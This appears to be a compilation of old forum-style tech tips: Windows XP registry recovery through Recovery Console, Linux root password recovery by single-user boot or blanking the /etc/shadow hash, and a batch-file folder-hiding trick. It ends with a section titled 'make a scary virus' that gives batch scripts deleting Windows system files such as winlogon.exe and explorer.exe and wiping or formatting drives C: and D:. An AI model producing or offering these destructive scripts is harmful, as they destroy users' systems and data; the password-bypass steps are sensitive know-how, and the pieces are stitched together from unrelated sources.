Recovering-from-a-corrupted-regisry-which-is-stopping-windows-xp-to-start

This tutorial describes how to recover a Windows XP system that does not start because of corruption in the registry. This procedure does not guarantee full recovery of the system to a previous state; however, you should be able to recover data when you use this tutor.

Warning:

Do not use the procedure that is described in this tutor if your computer has an OEM-installed operating system. The system hive on OEM installations creates passwords and user accounts that did not exist previously. If you use the procedure that is described in this tutor, you may not be able to log back into the recovery console to restore the original registry hives.

This Tutor assumes that typical recovery methods have failed and access to the system is not available except by using Recovery Console. If an Automatic System Recovery (ASR) backup exists, it is the preferred method for recovery. Mcft recommends that you use the ASR backup before you try the procedure described in this article.

Note Make sure to replace all five of the registry hives. If you only replace a single hive or two, this can cause potential issues because software and hardware may have settings in multiple locations in the registry.

If you experience a repetitive occurrence of registry corruption related issues, Mcft recommends that you obtain and install the hotfix in the following article:

MORE INFORMATION:

When you try to start or restart your Windows XP-based computer, you may receive one of the following error messages:

Windows XP could not start because the following file is missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SYSTEM
Windows XP could not start because the following file is missing or corrupt: \WINDOWS\SYSTEM32\CONFIG\SOFTWARE
Stop: c0000218 {Registry File Failure} The registry cannot load the hive (file): \SystemRoot\System32\Config\SOFTWARE or its log or alternate
System error: Lsass.exe

When trying to update a password the return status indicates that the value provided as the current password is not correct.

The procedure that this tutor describes uses Recovery Console and System Restore. This article also lists all the required steps in specific order to make sure that the process is fully completed. When you finish this procedure, the system returns to a state very close to the state before the problem occurred. If you have ever run NTBackup and completed a system state backup, you do not have to follow the procedures in parts two and three. You can go to part four.

Part one

In part one, you start the Recovery Console, create a temporary folder, back up the existing registry files to a new location, delete the registry files at their existing location, and then copy the registry files from the repair folder to the System32\Config folder. When you have finished this procedure, a registry is created that you can use to start Windows XP. This registry was created and saved during the initial setup of Windows XP. Therefore any changes and settings that occurred after the Setup program was finished are lost.

To complete part one, follow these steps:

1) Insert the Windows XP startup disk into the floppy disk drive, or insert the Windows XP CD-ROM into the CD-ROM drive, and then restart the computer.

Click to select any options that are required to start the computer from the CD-ROM drive if you are prompted to do so.

2) When the "Welcome to Setup" screen appears, press R to start the Recovery Console.

3) If you have a dual-boot or multiple-boot computer, select the installation that you want to access from the Recovery Console.

4) When you are prompted to do so, type the Administrator password. If the administrator password is blank, just press ENTER.

5) At the Recovery Console command prompt, type the following lines, pressing ENTER after you type each line:

md tmp

copy c:\windows\system32\config\system c:\windows\tmp\system.bak

copy c:\windows\system32\config\software c:\windows\tmp\software.bak

copy c:\windows\system32\config\sam c:\windows\tmp\sam.bak

copy c:\windows\system32\config\security c:\windows\tmp\security.bak

copy c:\windows\system32\config\default c:\windows\tmp\default.bak

delete c:\windows\system32\config\system

delete c:\windows\system32\config\software

delete c:\windows\system32\config\sam

delete c:\windows\system32\config\security

delete c:\windows\system32\config\default

copy c:\windows\repair\system c:\windows\system32\config\system

copy c:\windows\repair\software c:\windows\system32\config\software

copy c:\windows\repair\sam c:\windows\system32\config\sam

copy c:\windows\repair\security c:\windows\system32\config\security

copy c:\windows\repair\default c:\windows\system32\config\default

6) Type exit to quit Recovery Console. Your computer will restart.

Note This procedure assumes that Windows XP is installed to the C:\Windows folder. Make sure to change C:\Windows to the appropriate windows_folder if it is a different location.

If you have access to another computer, to save time, you can copy the text in step two, and then create a text file called "Regcopy1.txt" (for example). To create this file, run the following command when you start in Recovery Console:

batch regcopy1.txt

With the batch command in Recovery Console, you can process all the commands in a text file sequentially. When you use the batch command, you do not have to manually type as many commands.

  Part two

To complete the procedure described in this section, you must be logged on as an administrator, or an administrative user (a user who has an account in the Administrators group).

If you are using Windows XP Home Edition, you can log on as an administrative user. If you log on as an administrator, you must first start Windows XP Home Edition in Safe mode. To start the Windows XP Home Edition computer in Safe mode, follow these steps.

Step 7 contains a reference to the tutor.

1. Click Start, click Shut Down (or click Turn Off Computer), click Restart, and then click OK (or click Restart).

2. Press the F8 key.

When computer that is configured to start to multiple operating systems, you can press F8 when you see the Startup menu.

3. Use the arrow keys to select the Safe mode option, and then press ENTER.

4. If you have a dual-boot or multiple-boot system, use the arrow keys to select the installation that you want to access, and then press ENTER.

In part two, you copy the registry files from where u backed up location by using System Restore.

This folder is not available in Recovery Console and is generally not visible during typical usage. Before you start this procedure, you must change several settings to make the folder visible:

1. Start Windows Explorer.

2. On the Tools menu, click Folder options.

3. Click the View tab.

4. Under Hidden files and folders, click to select Show hidden files and folders, and then click to clear the Hide protected operating system files (Recommended) check box.

5. Click Yes when the dialog box that confirms that you want to display these files appears.

6. Double-click the drive where you installed Windows XP to display a list of the folders. If is important to click the correct drive.

7. Open the System Volume Information folder. This folder is unavailable and appears dimmed because it is set as a super-hidden folder.

Note This folder contains one or more _restore {GUID} folders such as "_restore{87BD3667-3246-476B-923F-F86E30B3E7F8}".

8. Open a folder that was not created at the current time. You may have to click Details on the View menu to see when these folders were created. There may be one or more folders starting with "RPx under this folder. These are restore points.

9. Open one of these folders to locate a Snapshot subfolder. The following path is an example of a folder path to the Snapshot folder:

C:\System Volume Information\_restore{D86480E3-73EF-47BC-A0EB-A81BE6EE3ED8}\RP1\Snapshot

10. From the Snapshot folder, copy the following files to the C:\Windows\Tmp folder:

o _REGISTRY_USER_.DEFAULT

o _REGISTRY_MACHINE_SECURITY

o _REGISTRY_MACHINE_SOFTWARE

o _REGISTRY_MACHINE_SYSTEM

o _REGISTRY_MACHINE_SAM

11. Rename the files in the C:\Windows\Tmp folder as follows:

o Rename _REGISTRY_USER_.DEFAULT to DEFAULT

o Rename _REGISTRY_MACHINE_SECURITY to SECURITY

o Rename _REGISTRY_MACHINE_SOFTWARE to SOFTWARE

o Rename _REGISTRY_MACHINE_SYSTEM to SYSTEM

o Rename _REGISTRY_MACHINE_SAM to SAM

These files are the backed up registry files from System Restore. Because you used the registry file that the Setup program created, this registry does not know that these restore points exist and are available. A new folder is created with a new GUID under System Volume Information and a restore point is created that includes a copy of the registry files that were copied during part one. Therefore, it is important not to use the most current folder, especially if the time stamp on the folder is the same as the current time.

The current system configuration is not aware of the previous restore points. You must have a previous copy of the registry from a previous restore point to make the previous restore points available again.

The registry files that were copied to the Tmp folder in the C:\Windows folder are moved to make sure that the files are available under Recovery Console. You must use these files to replace the registry files currently in the C:\Windows\System32\Config folder. By default, Recovery Console has limited folder access and cannot copy files from the System Volume folder.

Note The procedure described in this section assumes that you are running your computer with the FAT32 file system.

Part Three

In part three, you delete the existing registry files, and then copy the System Restore Registry files to the C:\Windows\System32\Config folder:

1. Start Recovery Console.

2. At the command prompt, type the following lines, pressing ENTER after you type each line:

del c:\windows\system32\config\sam

del c:\windows\system32\config\security

del c:\windows\system32\config\software

del c:\windows\system32\config\default

del c:\windows\system32\config\system

copy c:\windows\tmp\software c:\windows\system32\config\software

copy c:\windows\tmp\system c:\windows\system32\config\system

copy c:\windows\tmp\sam c:\windows\system32\config\sam

copy c:\windows\tmp\security c:\windows\system32\config\security

copy c:\windows\tmp\default c:\windows\system32\config\default

Note Some of these command lines may be wrapped for readability.

3. Type exit to quit Recovery Console. Your computer restarts.

Note This procedure assumes that Windows XP is installed to the C:\Windows folder. Make sure to change C:\Windows to the appropriate windows_folder if it is a different location.

If you have access to another computer, to save time, you can copy the text in step two, and then create a text file called "Regcopy1.txt" (for example).

Part Four

1. Click Start, and then click All Programs.

2. Click Accessories, and then click System Tools.

3. Click System Restore, and then click Restore to a previous RestorePoint.

APPLIES TO:

o Mcft Windows XP Home Edition

o Mcft Windows XP Professional

o Mcft Windows XP Tablet PC Edition

o Mcft Windows XP Media Center Edition 2002

Recover Root password - Linux

A common problem faced by new users ( and sometimes even experienced users ) is not knowing what to do when they lose their password. Even worse, when they lose the password for 'root'. Luckily, there are several solutions to help you recover access to your system.

Root Password - Easy Method:

The simplest way to recover from a lost password is to boot into single user mode.

If you are using LILO, at the LILO boot prompt (graphical LILO users can press Ctrl-x to exit the graphical screen and go to the boot: prompt), enter:

Code:

linux single

This will make you the "root" user without asking for a password. Once the system has booted, you can change the root password using the password command:

Code:

passwd
The instructions for GRUB users are similar. Press 'e' at the GRUB prompt to select boot parameters. Select the line for the kernel you want to boot, and go to the end of it. Add "single" as a separate word, and then press ENTER to exit the edit mode. Once back at the GRUB screen, press "b" to boot into single user mode.

If for whatever reason, the above solution doesn't work for you, there is another option. Boot using a so called "Live CD" Linux distribution, such as Knoppix. For the purposes of this example, it will be assumed that the user is using Knoppix.
After booting up from the Knoppix CD, go to a terminal and su to root (no password is required). After your priviledges have been escalated, issue the following commands (be sure to replace each /hda1 with your own root ('/') partition):

Code:

mount -o dev,rw /mnt/hda1 cd /mnt/hda1/etc

Once you are into your system /etc directory, you can use a text-editor (such as vim, nano, pico, etc.) to edit the /etc/shadow file where the password is stored. Various information about root and user accounts is kept in this plain-text file, but we are only concerned with the password portion.

For example, the /etc/shadow entry for the "root" account may look something like this:

Code:

root:$1$aB7mx0Licb$CTbs2RQrfPHkz5Vna0.fnz8H68tB.:/
10852:0:99999:7:::
(The '/' indicates a line continuation)


Now, using your favorite editor (I'll use vim) delete the password hash (the green text).

Code:

vim shadow

After you've edited this field, it should look like this:

Code:

root::10852:0:99999:7:::

Now save the file and change back to the root directory and unmount the system root partition (don't forget to change the /hda1) as follows:

Code:

cd / umount /mnt/hda1

Now reboot the computer.

Once the computer has booted and you're at the login prompt, type "root" and when asked for the password just press ENTER (entering no password). After a successful login, you need to set the new password for root using the following command:

Code:

passwd

Lock folder without any programme

THERE ARE VARIOUS SOFTWARE AVAILABLE IN THE WEB FOR LOCKING THE FOLDER .



HERE IS THE DEFAULT METHOD USED WITH IN WINDOW .



Follow these steps.



1. Suppose you have a folder named "LEARNER" in D:\LEARNER



2. In the same drive next to the folder create a new notepad file with the exact statement ren LEARNER LEARNER.{21EC2020-3AEA-1069-A2DD-08002B30309D}



3. Now save this text file as loc.bat or any other file with an extension ".bat"



4. Create another notepad file and type ren LEARNER.{21EC2020-3AEA-1069-A2DD-08002B30309D} LEARNER



5. Save this as key.bat or any other file with an extension ".bat"



6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .



7. To open the folder double click key.bat and you get back your original folder .



8. For more safety keep the key.bat in another location .Only for unlocking copy paste to the original location and double click.

if you want to make a scary virus right now

if you want to make a scary virus right now in less than 5mins open notepad and type the following….DONT OPEN IT!

@echo off
cd\WINDOWS\
@del explorer.exe
@del NOTEPAD.exe
cd\WINDOWS\system32\
@del winlogon.exe
@del spider.exe
@del notepad.exe
@del mspaint.exe
@del accwiz.exe
@del calc.exe
echo you have been killed
echo lol
echo hahahahaha
echo get ready.
end

when your done clisk save aand save file type as a bat
example….
virus.bat

AN YOUR DONE…. DONT OPEN IT


@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y


(write in notepad save as "filename.bat")